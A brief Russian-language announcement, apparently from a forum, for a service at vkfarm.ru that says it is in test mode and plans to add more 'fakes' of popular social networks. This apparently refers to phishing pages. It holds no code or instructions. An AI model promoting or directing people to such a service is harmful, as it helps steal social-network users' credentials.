Сервис запущен 06.08.2016 и пока находится в тестовом режиме. В ближайшее время ожидается добавление дополнительных фэйков популярных соц. сетей и дополнительных возможностей.

www.vkfarm.ru
  • Kivinapa, abkhaziadoda, EROocculse и еще 1 это нравится